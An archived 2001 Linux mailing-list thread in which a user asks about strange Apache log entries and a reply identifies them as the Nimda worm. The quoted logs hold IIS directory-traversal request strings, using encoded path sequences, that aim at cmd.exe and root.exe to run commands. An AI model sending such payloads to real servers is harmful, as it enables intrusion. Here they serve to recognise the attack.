[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: under attack ?
- To: Ishai Parasol <ishai-iglu(at-nospam)parasol.org.il>
- Subject: Re: under attack ?
- From: Dani Arbel <darbel(at-nospam)techunix.technion.ac.il>
- Date: Wed, 19 Sep 2001 21:25:05 +0300 (IDT)
- Cc: Linux - IL Mailing List <linux-il(at-nospam)linux.org.il>
- Delivered-To: linux.org.il-linux-il@linux.org.il
- In-Reply-To: <000d01c1413c$cfd26580$0201a8c0@parasol>
- Sender: linux-il-bounce(at-nospam)cs.huji.ac.il
There is a new worm out there flooding the net. watch for
slowwwwwwwliness.
see in symantec/macaffee etc . search for "nimda"
Dani
On Wed, 19 Sep 2001, Ishai Parasol wrote:
> Hi
>
> my apache logs gives me tons of this crap:
>
> 212.29.230.44 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:26 +0300] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:31 +0300] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:34 +0300] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:38 +0300] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:44 +0300] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:05 +0300] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:08 +0300] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:11 +0300] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:17 +0300] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
>
> Does it mean someone thinks I'm running NT and try to hack to my server ?
> I also get alot of "GET default.ide...." and about this I'm almost sure that
> it's related to NT servers, but I'm not sure about the rest. Questions:
> 1) Am I right ?
> 2) What can I do about it ?
>
> Thanks,
> Ishai.
>
>
> =================================================================
> To unsubscribe, send mail to linux-il-request@linux.org.il with
> the word "unsubscribe" in the message body, e.g., run the command
> echo unsubscribe | mail linux-il-request@linux.org.il
>
=================================================================
To unsubscribe, send mail to linux-il-request@linux.org.il with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail linux-il-request@linux.org.il